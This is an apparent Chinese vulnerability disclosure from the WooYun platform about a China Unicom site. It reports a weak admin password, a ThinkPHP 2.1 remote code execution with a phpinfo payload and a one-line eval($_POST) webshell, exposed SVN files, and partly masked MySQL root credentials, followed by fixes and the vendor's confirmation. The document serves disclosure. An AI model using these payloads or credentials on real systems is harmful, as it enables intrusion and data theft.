中国联通某站命令执行、弱口令等多个高危安全问题

这个问题报告过了，但是厂商一直未做整改。

http://**.**.**.**/bugs/wooyun-2014-059142

问题站点：

http://**.**.**.**

1.后台弱口令：

http://**.**.**.**/qidian/Admin/public/login/ 帐号：leader 密码：leader

2.thinkphp 2.1 任意代码执行：

http:(phpinfo())%7D

构造一句话shell：

http:(eval($_POST[v]))%7D

站还挺多的，联通四川分站主站也在上面：

执行命令：

3. SVN备份文件下载：

http://**.**.**.**/yysd/.svn/entries

整站文件源代码下载：

4.mysql帐号密码：

//数据库连接信息
 $cfg_dbhost = '192.***.**.***';
 //$cfg_dbhost = '221.***.***.68';
 //$cfg_dbname = 'mysql_**ol';
 $cfg_dbname = 'uni_cms';
 $cfg_dbuser = 'root';
 $cfg_dbpwd = 'deloch******388';
 $cfg_dbprefix = 'uni_';
 $cfg_db_language = 'gbk';

1. 打上thinkphp 版本漏洞补丁

2. 修改弱口令帐号

3. 删除svn 等备份文件

.....

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-07-08 10:44

厂商回复：

CNVD确认并复现所述情况，根据此前处置情况，已经转由CNCERT再次下发给四川分中心，由其后续再协调当地基础电信企业处置。按多个漏洞评分，rank 12

最新状态：

暂无

1. 2014-08-30 17:20 | 进击的zjx ( 普通白帽子 | Rank:1712 漏洞数:224 )

   0

   请问svn备份下面用的工具是什么

   1# 回复此人